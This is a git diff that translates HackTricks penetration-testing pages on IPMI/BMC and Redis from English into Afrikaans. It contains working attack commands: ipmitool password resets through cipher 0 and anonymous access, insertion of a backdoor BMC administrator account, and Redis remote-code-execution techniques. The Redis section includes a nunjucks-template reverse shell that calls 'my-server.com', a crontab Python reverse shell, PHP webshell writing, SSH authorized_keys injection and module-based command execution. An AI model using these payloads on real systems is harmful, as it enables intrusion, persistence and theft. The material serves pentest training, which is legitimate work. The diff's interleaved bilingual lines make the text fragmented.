scanner can be employed: +### **IPMI-outentifikasie-omleiding via Sifer 0** +Om hierdie fout op te spoor, kan die volgende Metasploit hulpprogram vir skandering gebruik word: ```bash use auxiliary/scanner/ipmi/ipmi_cipher_zero ``` - -Exploitation of this flaw is achievable with `ipmitool`, as demonstrated below, allowing for the listing and modification of user passwords: - +Uitbuiting van hierdie fout is haalbaar met `ipmitool`, soos hieronder gedemonstreer, wat die lys en wysiging van gebruikerswagwoorde moontlik maak: ```bash apt-get install ipmitool # Installation command ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password ``` +### **IPMI 2.0 RAKP-verifikasie Verwydering van Verwyderde Wagwoord Hash** -### **IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval** - -This vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. To test this vulnerability, Metasploit offers a module: - +Hierdie kwesbaarheid maak dit moontlik om gesoute gehashde wagwoorde (MD5 en SHA1) vir enige bestaande gebruikersnaam te herwin. Om hierdie kwesbaarheid te toets, bied Metasploit 'n module aan: ```bash msf > use auxiliary/scanner/ipmi/ipmi_dumphashes ``` +### **IPMI Anonieme Verifikasie** -### **IPMI Anonymous Authentication** - -A default configuration in many BMCs allows "anonymous" access, characterized by null username and password strings. This configuration can be exploited to reset passwords of named user accounts using `ipmitool`: - +'n Standaard konfigurasie in baie BMC's maak "anonieme" toegang moontlik, gekenmerk deur 'n leë gebruikersnaam en wagwoord. Hierdie konfigurasie kan uitgebuit word om wagwoorde van genoemde gebruikersrekeninge te herstel deur gebruik te maak van `ipmitool`: ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword ``` +### **Supermicro IPMI Duidelike-tekswagwoorde** -### **Supermicro IPMI Clear-text Passwords** - -A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as `/nv/PSBlock` or `/nv/PSStore` raises significant security concerns: - +'n Kritieke ontwerpkeuse in IPMI 2.0 vereis die berging van duidelike-tekswagwoorde binne BMC's vir outentiseringsdoeleindes. Supermicro se berging van hierdie wagwoorde in plekke soos `/nv/PSBlock` of `/nv/PSStore` veroorsaak aansienlike veiligheidskwessies: ```bash cat /nv/PSBlock ``` +### **Supermicro IPMI UPnP Kwesbaarheid** -### **Supermicro IPMI UPnP Vulnerability** - -Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by [Rapid7's disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), allow for root access to the BMC: - +Supermicro se insluiting van 'n UPnP SSDP luisteraar in sy IPMI-firmware, veral op UDP-poort 1900, stel 'n ernstige veiligheidsrisiko in. Kwesbaarhede in die Intel SDK vir UPnP-toestelle weergawe 1.3.1, soos beskryf deur [Rapid7 se openbaarmaking](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), maak dit moontlik om root-toegang tot die BMC te verkry: ```bash msf> use exploit/multi/upnp/libupnp_ssdp_overflow ``` - - ### Brute Force -**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows: +**HP randomiseer die verstek wagwoord** vir sy **Integrated Lights Out (iLO)** produk tydens vervaardiging. Hierdie praktyk verskil van ander vervaardigers wat geneig is om **statiese verstek geloofsbriewe** te gebruik. 'n Opsomming van verstek gebruikersname en wagwoorde vir verskeie produkte word as volg verskaf: -- **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level. -- Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively. -- Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords. +- **HP Integrated Lights Out (iLO)** gebruik 'n **fabrieksgematigde 8-karakter string** as sy verstek wagwoord, wat 'n hoër veiligheidsvlak toon. +- Produkte soos **Dell se iDRAC, IBM se IMM**, en **Fujitsu se Integrated Remote Management Controller** gebruik maklik raadbare wagwoorde soos "calvin", "PASSW0RD" (met 'n nul), en "admin" onderskeidelik. +- Op soortgelyke wyse gebruik **Supermicro IPMI (2.0), Oracle/Sun ILOM**, en **ASUS iKVM BMC** ook eenvoudige verstek geloofsbriewe, met "ADMIN", "changeme", en "admin" as hul wagwoorde. +## Toegang tot die Gasheer via BMC -## Accessing the Host via BMC +Administratiewe toegang tot die Baseboard Management Controller (BMC) maak verskeie roetes oop vir toegang tot die gasheer se bedryfstelsel. 'n Reguit benadering behels die uitbuiting van die BMC se Keyboard, Video, Mouse (KVM) funksionaliteit. Dit kan gedoen word deur óf die gasheer te herlaai na 'n root-skulp via GRUB (deur `init=/bin/sh` te gebruik) óf deur te herlaai vanaf 'n virtuele CD-ROM wat as 'n reddingskyf ingestel is. Sulke metodes maak direkte manipulasie van die gasheer se skyf moontlik, insluitend die invoeging van agterdeure, data-onttrekking, of enige nodige aksies vir 'n sekuriteitsassessering. Dit vereis egter dat die gasheer herlaai word, wat 'n groot nadeel is. Sonder om te herlaai, is toegang tot die lopende gasheer meer kompleks en wissel afhangende van die gasheer se konfigurasie. As die gasheer se fisiese of seriële konsole aangemeld bly, kan dit maklik oorgeneem word deur die BMC se KVM- of seriële-oor-LAN (sol) funksionaliteite via `ipmitool`. Die uitbuiting van gedeelde hardwareressources, soos die i2c-bus en Super I/O-skyf, is 'n gebied wat verdere ondersoek verg. -Administrative access to the Baseboard Management Controller (BMC) opens various pathways for accessing the host's operating system. A straightforward approach involves exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality. This can be done by either rebooting the host to a root shell via GRUB (using `init=/bin/sh`) or booting from a virtual CD-ROM set as a rescue disk. Such methods allow for direct manipulation of the host's disk, including the insertion of backdoors, data extraction, or any necessary actions for a security assessment. However, this requires rebooting the host, which is a significant drawback. Without rebooting, accessing the running host is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can easily be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via `ipmitool`. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, is an area that demands further investigation. - -## Introducing Backdoors into BMC from the Host - -Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS. +## Invoering van Agterdeure in BMC vanaf die Gasheer +Nadat 'n gasheer wat toegerus is met 'n BMC gekompromitteer is, kan die **plaaslike BMC-koppelvlak gebruik word om 'n agterdeur-gebruikersrekening in te voeg**, wat 'n blywende teenwoordigheid op die bediener skep. Hierdie aanval vereis die teenwoordigheid van **`ipmitool`** op die gekompromitteerde gasheer en die aktivering van BMC-bestuursprogramondersteuning. Die volgende opdragte illustreer hoe 'n nuwe gebruikersrekening in die BMC ingevoeg kan word deur gebruik te maak van die plaaslike koppelvlak van die gasheer, wat die behoefte aan verifikasie omseil. Hierdie tegniek is toepaslik op 'n wye verskeidenheid bedryfstelsels, insluitend Linux, Windows, BSD, en selfs DOS. ```bash ipmitool user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit @@ -141,26 +122,24 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit 3 root true false false Unknown (0x00) 4 backdoor true false true ADMINISTRATOR ``` - - ## Shodan * `port:623` -## References +## Verwysings * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index f7f8a763a..fea741be3 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -2,100 +2,89 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutvinders van beloningsjagte! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutvindings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -From [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker). +Vanaf [die dokumentasie](https://redis.io/topics/introduction): Redis is 'n oopbron (BSD-gelisensieerde), in-memory **datastruktuurwinkel**, wat gebruik word as 'n **databasis**, cache en boodskapmakelaar). -By default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). - -**Default port:** 6379 +Standaard gebruik Redis 'n teksgebaseerde protokol, maar onthou dat dit ook **ssl/tls** kan implementeer. Leer hoe om [Redis met ssl/tls hier uit te voer](https://fossies.org/linux/redis/TLS.md). +**Standaardpoort:** 6379 ``` PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9 ``` +## Outomatiese Opsomming -## Automatic Enumeration - -Some automated tools that can help to obtain info from a redis instance: - +Sommige outomatiese gereedskap wat kan help om inligting van 'n Redis-instantie te verkry: ```bash nmap --script redis-info -sV -p 6379 msf> use auxiliary/scanner/redis/redis_server ``` +## Handmatige Enumerasie -## Manual Enumeration +### Banier -### Banner - -Redis is a **text based protocol**, you can just **send the command in a socket** and the returned values will be readable. Also remember that Redis can run using **ssl/tls** (but this is very weird). - -In a regular Redis instance you can just connect using `nc` or you could also use `redis-cli`: +Redis is 'n **teksgebaseerde protokol**, jy kan net die bevel in 'n sokket stuur en die teruggekeerde waardes sal leesbaar wees. Onthou ook dat Redis kan loop met behulp van **ssl/tls** (maar dit is baie vreemd). +In 'n gewone Redis-instantie kan jy net verbind met behulp van `nc` of jy kan ook `redis-cli` gebruik: ```bash nc -vn 10.10.10.10 6379 redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools ``` - -The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned: - +Die **eerste bevel** wat jy kan probeer is **`info`**. Dit **kan uitset met inligting** van die Redis-instantie **teruggee of iets** soos die volgende kan teruggegee word: ``` -NOAUTH Authentication required. ``` +In hierdie laaste geval beteken dit dat **jy geldige geloofsbriewe nodig het** om toegang tot die Redis-instantie te verkry. -In this last case, this means that **you need valid credentials** to access the Redis instance. +### Redis-verifikasie -### Redis Authentication - -**By default** Redis can be accessed **without credentials**. However, it can be **configured** to support **only password, or username + password**.\ -It is possible to **set a password** in _**redis.conf**_ file with the parameter `requirepass` **or temporary** until the service restarts connecting to it and running: `config set requirepass p@ss$12E45`.\ -Also, a **username** can be configured in the parameter `masteruser` inside the _**redis.conf**_ file. +**Standaard** kan Redis **sonder geloofsbriewe** benader word. Dit kan egter **gekonfigureer** word om slegs **wagwoord, of gebruikersnaam + wagwoord** te ondersteun.\ +Dit is moontlik om 'n wagwoord in die _**redis.conf**_ lêer in te stel met die parameter `requirepass` **of tydelik** totdat die diens herlaai word deur daarmee te verbind en die volgende uit te voer: `config set requirepass p@ss$12E45`.\ +'n **Gebruikersnaam** kan ook gekonfigureer word in die parameter `masteruser` binne die _**redis.conf**_ lêer. {% hint style="info" %} -If only password is configured the username used is "**default**".\ -Also, note that there is **no way to find externally** if Redis was configured with only password or username+password. +As slegs 'n wagwoord gekonfigureer is, word die gebruikte gebruikersnaam "**default**".\ +Merk ook op dat daar **geen manier is om ekstern te vind** of Redis gekonfigureer is met slegs 'n wagwoord of gebruikersnaam+wagwoord nie. {% endhint %} -In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) it.\ -**In case you found valid credentials you need to authenticate the session** after establishing the connection with the command: - +In gevalle soos hierdie sal jy **geldige geloofsbriewe moet vind** om met Redis te kan kommunikeer, dus kan jy probeer om dit [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) te doen.\ +**In die geval dat jy geldige geloofsbriewe gevind het, moet jy die sessie verifieer** nadat die verbinding tot stand gebring is met die volgende bevel: ```bash AUTH ``` +**Geldige geloofsbriewe** sal beantwoord word met: `+OK` -**Valid credentials** will be responded with: `+OK` - -### **Authenticated enumeration** - -If the Redis server permits **anonymous connections** or if you have obtained valid credentials, you can initiate the enumeration process for the service using the following **commands**: +### **Geauthentiseerde opname** +As die Redis-bediener **anonieme verbindinge** toelaat of as jy geldige geloofsbriewe verkry het, kan jy die opnameproses vir die diens inisieer deur die volgende **opdragte** te gebruik: ```bash INFO [ ... Redis response with info ... ] @@ -104,48 +93,40 @@ client list CONFIG GET * [ ... Get config ... ] ``` +**Ander Redis-opdragte** [**kan hier gevind word**](https://redis.io/topics/data-types-intro) **en** [**hier**](https://lzone.de/cheat-sheet/Redis)**.** -**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.** - -Note that the **Redis commands of an instance can be renamed** or removed in the _redis.conf_ file. For example this line will remove the command FLUSHDB: - +Merk op dat die **Redis-opdragte van 'n instansie hernoem** of verwyder kan word in die _redis.conf_ lêer. Byvoorbeeld, hierdie lyn sal die opdrag FLUSHDB verwyder: ``` rename-command FLUSHDB "" ``` +Meer oor die veilige konfigurasie van 'n Redis-diens hier: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) -More about configuring securely a Redis service here: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) +Jy kan ook **in werklike tyd die Redis-opdragte monitor** met die opdrag **`monitor`** of die top **25 stadigste navrae** kry met **`slowlog get 25`** -You can also **monitor in real time the Redis commands** executed with the command **`monitor`** or get the top **25 slowest queries** with **`slowlog get 25`** +Vind meer interessante inligting oor meer Redis-opdragte hier: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) -Find more interesting information about more Redis commands here: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) +### **Databasis aflaai** -### **Dumping Database** - -Inside Redis the **databases are numbers starting from 0**. You can find if anyone is used in the output of the command `info` inside the "Keyspace" chunk: +Binne Redis is die **databasisse nommers wat begin by 0**. Jy kan vind of enigeen gebruik word in die uitset van die opdrag `info` binne die "Keyspace" blok: ![](<../.gitbook/assets/image (315).png>) -Or you can just get all the **keyspaces** (databases) with: - +Of jy kan net al die **keyspaces** (databasisse) kry met: ``` INFO keyspace ``` - -In that example the **database 0 and 1** are being used. **Database 0 contains 4 keys and database 1 contains 1**. By default Redis will use database 0. In order to dump for example database 1 you need to do: - +In daardie voorbeeld word die **databasis 0 en 1** gebruik. **Databasis 0 bevat 4 sleutels en databasis 1 bevat 1**. Standaard gebruik Redis databasis 0. Om byvoorbeeld databasis 1 te dump, moet jy die volgende doen: ```bash SELECT 1 [ ... Indicate the database ... ] -KEYS * +KEYS * [ ... Get Keys ... ] GET [ ... Get Key ... ] ``` +In die geval dat jy die volgende fout kry `-WRONGTYPE Operasie teen 'n sleutel wat die verkeerde soort waarde bevat` terwyl jy `GET ` uitvoer, is dit omdat die sleutel dalk iets anders as 'n string of 'n heelgetal is en 'n spesiale operator vereis om dit te vertoon. -In case you get the follwing error `-WRONGTYPE Operation against a key holding the wrong kind of value` while running `GET ` it's because the key may be something else than a string or an integer and requires a special operator to display it. - -To know the type of the key, use the `TYPE` command, example below for list and hash keys. - +Om die tipe van die sleutel te weet, gebruik die `TYPE` bevel, voorbeeld hieronder vir lys- en hashsleutels. ``` TYPE [ ... Type of the Key ... ] @@ -154,38 +135,34 @@ LRANGE 0 -1 HGET [ ... Get hash item ... ] ``` - -**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) +**Dump die databasis met npm** [**redis-dump**](https://www.npmjs.com/package/redis-dump) **of python** [**redis-utils**](https://pypi.org/project/redis-utils/)
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige hacking-wêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! ## Redis RCE -### Interactive Shell - -[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) can automatically get an interactive shell or a reverse shell in Redis(<=5.0.5). +### Interaktiewe Skulp +[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) kan outomaties 'n interaktiewe skulp of 'n omgekeerde skulp in Redis (<=5.0.5) kry. ``` ./redis-rogue-server.py --rhost --lhost ``` - ### PHP Webshell -Info from [**here**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html). You must know the **path** of the **Web site folder**: - +Inligting vanaf [**hier**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html). Jy moet die **pad** van die **Webwerf vouer** weet: ``` root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /usr/share/nginx/html @@ -197,59 +174,55 @@ OK 10.85.0.52:6379> save OK ``` +As die webshell toegang uitsondering gee, kan jy die databasis leegmaak na rugsteun en weer probeer, onthou om die databasis te herstel. -​If the webshell access exception, you can empty the database after backup and try again, remember to restore the database. +### Sjabloon Webshell -### Template Webshell - -Like in the previous section you could also overwrite some html template file that is going to be interpreted by a template engine and obtain a shell. - -For example, following [**this writeup**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/), you can see that the attacker injected a **rev shell in an html** interpreted by the **nunjucks template engine:** +Soos in die vorige afdeling kan jy ook 'n paar html-sjabloonlêers oorskryf wat deur 'n sjabloon-enjin geïnterpreteer gaan word en 'n shell verkry. +Byvoorbeeld, volgens [**hierdie writeup**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/), kan jy sien dat die aanvaller 'n **rev shell in 'n html** ingespuit het wat deur die **nunjucks sjabloon-enjin** geïnterpreteer word: ```javascript {{ ({}).constructor.constructor( - "var net = global.process.mainModule.require('net'), - cp = global.process.mainModule.require('child_process'), - sh = cp.spawn('sh', []); - var client = new net.Socket(); - client.connect(1234, 'my-server.com', function(){ - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - });" +"var net = global.process.mainModule.require('net'), +cp = global.process.mainModule.require('child_process'), +sh = cp.spawn('sh', []); +var client = new net.Socket(); +client.connect(1234, 'my-server.com', function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +});" )()}} ``` - {% hint style="warning" %} -Note that **several template engines cache** the templates in **memory**, so even if you overwrite them, the new one **won't be executed**. In this cases, either the developer left the automatic reload active or you need to do a DoS over the service (and expect that it will be relaunched automatically). +Let daarop dat **verskeie sjabloondraaiers die sjablone in die geheue stoor**, so selfs al oorskryf jy hulle, sal die nuwe een **nie uitgevoer word nie**. In hierdie gevalle het die ontwikkelaar óf die outomatiese herlaai aktief gelaat óf jy moet 'n DoS oor die diens doen (en verwag dat dit outomaties herlaai sal word). {% endhint %} ### SSH -Example [from here](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) +Voorbeeld [van hier](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) -Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** (usually _/var/lib/redis_ or _/home/redis/.ssh_), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: +Wees bewus dat die resultaat van **`config get dir`** kan verander na ander handmatige uitbuitingsopdragte. Stel voor om dit eerste uit te voer direk nadat jy in Redis ingeteken het. In die uitset van **`config get dir`** kan jy die **tuiste** van die **redis-gebruiker** vind (gewoonlik _/var/lib/redis_ of _/home/redis/.ssh_), en deur dit te weet, weet jy waar jy die `authenticated_users`-lêer kan skryf om toegang te verkry via ssh **met die gebruiker redis**. As jy die tuiste van 'n ander geldige gebruiker ken waar jy skryfregte het, kan jy dit ook misbruik: -1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`** -2. Write the public key to a file : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** -3. Import the file into redis : **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** -4. Save the public key to the **authorized\_keys** file on redis server: +1. Genereer 'n ssh openbare-privaat sleutelpaar op jou rekenaar: **`ssh-keygen -t rsa`** +2. Skryf die openbare sleutel na 'n lêer: **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** +3. Importeer die lêer na Redis: **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** +4. Stoor die openbare sleutel in die **authorized\_keys**-lêer op die Redis-bediener: - ``` - root@Urahara:~# redis-cli -h 10.85.0.52 - 10.85.0.52:6379> config set dir /var/lib/redis/.ssh - OK - 10.85.0.52:6379> config set dbfilename "authorized_keys" - OK - 10.85.0.52:6379> save - OK - ``` -5. Finally, you can **ssh** to the **redis server** with private key : **ssh -i id\_rsa redis@10.85.0.52** +``` +root@Urahara:~# redis-cli -h 10.85.0.52 +10.85.0.52:6379> config set dir /var/lib/redis/.ssh +OK +10.85.0.52:6379> config set dbfilename "authorized_keys" +OK +10.85.0.52:6379> save +OK +``` +5. Uiteindelik kan jy **ssh** na die **Redis-bediener** met die privaat sleutel: **ssh -i id\_rsa redis@10.85.0.52** -**This technique is automated here:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) +**Hierdie tegniek is outomaties hier beskikbaar:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) ### Crontab - ``` root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1 OK @@ -260,40 +233,38 @@ OK root@Urahara:~# redis-cli -h 10.85.0.52 save OK ``` +Die laaste voorbeeld is vir Ubuntu, vir **Centos**, moet die bogenoemde bevel wees: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` -The last example is for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` +Hierdie metode kan ook gebruik word om bitcoin te verdien: [yam](https://www.v2ex.com/t/286981#reply14) -This method can also be used to earn bitcoin :[yam](https://www.v2ex.com/t/286981#reply14) +### Laai Redis Module -### Load Redis Module +1. Volg die instruksies vanaf [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) om 'n Redis-module te **kompileer om willekeurige bevele uit te voer**. +2. Jy benodig dan 'n manier om die gekompileerde module **op te laai**. +3. **Laai die opgelaaide module** tydens uitvoering met `MODULE LOAD /path/to/mymodule.so`. +4. **Lys gelaai modules** om te bevestig dat dit korrek gelaai is: `MODULE LIST`. +5. **Voer bevele uit**: -1. Following the instructions from [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) you can **compile a redis module to execute arbitrary commands**. -2. Then you need some way to **upload the compiled** module -3. **Load the uploaded module** at runtime with `MODULE LOAD /path/to/mymodule.so` -4. **List loaded modules** to check it was correctly loaded: `MODULE LIST` -5. **Execute** **commands**: +``` +127.0.0.1:6379> system.exec "id" +"uid=0(root) gid=0(root) groups=0(root)\n" +127.0.0.1:6379> system.exec "whoami" +"root\n" +127.0.0.1:6379> system.rev 127.0.0.1 9999 +``` +6. Ontlaai die module wanneer 